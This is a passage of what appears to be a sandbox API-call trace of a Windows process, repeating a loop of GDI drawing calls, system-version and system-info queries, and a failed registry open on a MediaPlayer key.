(hdc=0x0) returned 0 [0088.200] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.200] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.200] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.200] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.200] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.200] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.200] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.200] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.200] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x850401d0 [0088.200] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x870401cd [0088.200] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041029 [0088.200] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104102a [0088.200] CombineRgn (hrgnDst=0x1041029, hrgnSrc1=0x850401d0, hrgnSrc2=0x870401cd, iMode=1) returned 1 [0088.200] CombineRgn (hrgnDst=0x104102a, hrgnSrc1=0x850401d0, hrgnSrc2=0x870401cd, iMode=4) returned 2 [0088.200] CreateSolidBrush (color=0xff) returned 0x2101028 [0088.200] CreateSolidBrush (color=0xff0000) returned 0x110102b [0088.200] DeleteObject (ho=0x110102b) returned 1 [0088.200] DeleteObject (ho=0x870401cd) returned 1 [0088.200] DeleteObject (ho=0x850401d0) returned 1 [0088.200] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.200] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.200] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.200] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.200] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.200] BeginPath (hdc=0x0) returned 0 [0088.200] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.200] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.200] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.200] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.201] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.201] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.201] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.201] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.201] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x880401cd [0088.201] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x860401d0 [0088.201] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104102c [0088.201] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104102d [0088.201] CombineRgn (hrgnDst=0x104102c, hrgnSrc1=0x880401cd, hrgnSrc2=0x860401d0, iMode=1) returned 1 [0088.201] CombineRgn (hrgnDst=0x104102d, hrgnSrc1=0x880401cd, hrgnSrc2=0x860401d0, iMode=4) returned 2 [0088.201] CreateSolidBrush (color=0xff) returned 0x210102b [0088.201] CreateSolidBrush (color=0xff0000) returned 0x110102e [0088.201] DeleteObject (ho=0x110102e) returned 1 [0088.201] DeleteObject (ho=0x860401d0) returned 1 [0088.201] DeleteObject (ho=0x880401cd) returned 1 [0088.201] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.201] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.201] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.201] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.201] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.201] BeginPath (hdc=0x0) returned 0 [0088.201] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.201] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.201] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.201] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.201] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.201] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.201] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.201] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.201] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x870401d0 [0088.201] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x890401cd [0088.201] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104102f [0088.201] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041030 [0088.201] CombineRgn (hrgnDst=0x104102f, hrgnSrc1=0x870401d0, hrgnSrc2=0x890401cd, iMode=1) returned 1 [0088.201] CombineRgn (hrgnDst=0x1041030, hrgnSrc1=0x870401d0, hrgnSrc2=0x890401cd, iMode=4) returned 2 [0088.202] CreateSolidBrush (color=0xff) returned 0x210102e [0088.202] CreateSolidBrush (color=0xff0000) returned 0x1101031 [0088.202] DeleteObject (ho=0x1101031) returned 1 [0088.202] DeleteObject (ho=0x890401cd) returned 1 [0088.202] DeleteObject (ho=0x870401d0) returned 1 [0088.202] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.202] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.202] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.202] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.202] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.202] BeginPath (hdc=0x0) returned 0 [0088.202] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.202] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.202] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.202] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.202] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.202] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.202] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.202] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.202] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8a0401cd [0088.202] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x880401d0 [0088.202] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041032 [0088.202] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041033 [0088.202] CombineRgn (hrgnDst=0x1041032, hrgnSrc1=0x8a0401cd, hrgnSrc2=0x880401d0, iMode=1) returned 1 [0088.202] CombineRgn (hrgnDst=0x1041033, hrgnSrc1=0x8a0401cd, hrgnSrc2=0x880401d0, iMode=4) returned 2 [0088.202] CreateSolidBrush (color=0xff) returned 0x2101031 [0088.202] CreateSolidBrush (color=0xff0000) returned 0x1101034 [0088.202] DeleteObject (ho=0x1101034) returned 1 [0088.202] DeleteObject (ho=0x880401d0) returned 1 [0088.202] DeleteObject (ho=0x8a0401cd) returned 1 [0088.202] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.202] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.202] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.202] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.202] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.202] BeginPath (hdc=0x0) returned 0 [0088.202] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.202] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.202] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.202] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.202] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.202] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.203] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.203] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.203] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x890401d0 [0088.203] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8b0401cd [0088.203] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041035 [0088.203] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041036 [0088.203] CombineRgn (hrgnDst=0x1041035, hrgnSrc1=0x890401d0, hrgnSrc2=0x8b0401cd, iMode=1) returned 1 [0088.203] CombineRgn (hrgnDst=0x1041036, hrgnSrc1=0x890401d0, hrgnSrc2=0x8b0401cd, iMode=4) returned 2 [0088.203] CreateSolidBrush (color=0xff) returned 0x2101034 [0088.203] CreateSolidBrush (color=0xff0000) returned 0x1101037 [0088.203] DeleteObject (ho=0x1101037) returned 1 [0088.203] DeleteObject (ho=0x8b0401cd) returned 1 [0088.203] DeleteObject (ho=0x890401d0) returned 1 [0088.203] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.203] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.203] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.203] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.203] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.203] BeginPath (hdc=0x0) returned 0 [0088.203] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.203] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.203] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.203] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.203] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.203] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.203] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.203] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.203] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8c0401cd [0088.203] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8a0401d0 [0088.203] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041038 [0088.203] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041039 [0088.203] CombineRgn (hrgnDst=0x1041038, hrgnSrc1=0x8c0401cd, hrgnSrc2=0x8a0401d0, iMode=1) returned 1 [0088.203] CombineRgn (hrgnDst=0x1041039, hrgnSrc1=0x8c0401cd, hrgnSrc2=0x8a0401d0, iMode=4) returned 2 [0088.203] CreateSolidBrush (color=0xff) returned 0x2101037 [0088.203] CreateSolidBrush (color=0xff0000) returned 0x110103a [0088.203] DeleteObject (ho=0x110103a) returned 1 [0088.203] DeleteObject (ho=0x8a0401d0) returned 1 [0088.203] DeleteObject (ho=0x8c0401cd) returned 1 [0088.204] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.204] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.204] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.204] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.204] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.204] BeginPath (hdc=0x0) returned 0 [0088.204] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.204] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.204] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.204] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.204] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.204] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.204] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.204] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.204] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8b0401d0 [0088.204] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8d0401cd [0088.204] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104103b [0088.204] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104103c [0088.204] CombineRgn (hrgnDst=0x104103b, hrgnSrc1=0x8b0401d0, hrgnSrc2=0x8d0401cd, iMode=1) returned 1 [0088.204] CombineRgn (hrgnDst=0x104103c, hrgnSrc1=0x8b0401d0, hrgnSrc2=0x8d0401cd, iMode=4) returned 2 [0088.204] CreateSolidBrush (color=0xff) returned 0x210103a [0088.204] CreateSolidBrush (color=0xff0000) returned 0x110103d [0088.204] DeleteObject (ho=0x110103d) returned 1 [0088.204] DeleteObject (ho=0x8d0401cd) returned 1 [0088.204] DeleteObject (ho=0x8b0401d0) returned 1 [0088.204] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.204] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.204] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.204] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.204] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.204] BeginPath (hdc=0x0) returned 0 [0088.204] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.204] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.204] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.204] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.204] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.204] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.204] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.204] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.205] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8e0401cd [0088.205] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8c0401d0 [0088.205] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104103e [0088.205] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104103f [0088.205] CombineRgn (hrgnDst=0x104103e, hrgnSrc1=0x8e0401cd, hrgnSrc2=0x8c0401d0, iMode=1) returned 1 [0088.205] CombineRgn (hrgnDst=0x104103f, hrgnSrc1=0x8e0401cd, hrgnSrc2=0x8c0401d0, iMode=4) returned 2 [0088.205] CreateSolidBrush (color=0xff) returned 0x210103d [0088.205] CreateSolidBrush (color=0xff0000) returned 0x1101040 [0088.205] DeleteObject (ho=0x1101040) returned 1 [0088.205] DeleteObject (ho=0x8c0401d0) returned 1 [0088.205] DeleteObject (ho=0x8e0401cd) returned 1 [0088.205] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.205] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.205] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.205] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.205] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.205] BeginPath (hdc=0x0) returned 0 [0088.205] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.205] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.205] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.205] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.205] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.205] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.205] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.205] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.205] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8d0401d0 [0088.205] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8f0401cd [0088.205] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041041 [0088.205] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041042 [0088.205] CombineRgn (hrgnDst=0x1041041, hrgnSrc1=0x8d0401d0, hrgnSrc2=0x8f0401cd, iMode=1) returned 1 [0088.205] CombineRgn (hrgnDst=0x1041042, hrgnSrc1=0x8d0401d0, hrgnSrc2=0x8f0401cd, iMode=4) returned 2 [0088.205] CreateSolidBrush (color=0xff) returned 0x2101040 [0088.205] CreateSolidBrush (color=0xff0000) returned 0x1101043 [0088.205] DeleteObject (ho=0x1101043) returned 1 [0088.205] DeleteObject (ho=0x8f0401cd) returned 1 [0088.205] DeleteObject (ho=0x8d0401d0) returned 1 [0088.205] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.205] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.206] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.206] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.206] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.206] BeginPath (hdc=0x0) returned 0 [0088.206] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.206] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.206] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.206] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.206] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.206] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.206] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.206] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.206] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x900401cd [0088.206] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8e0401d0 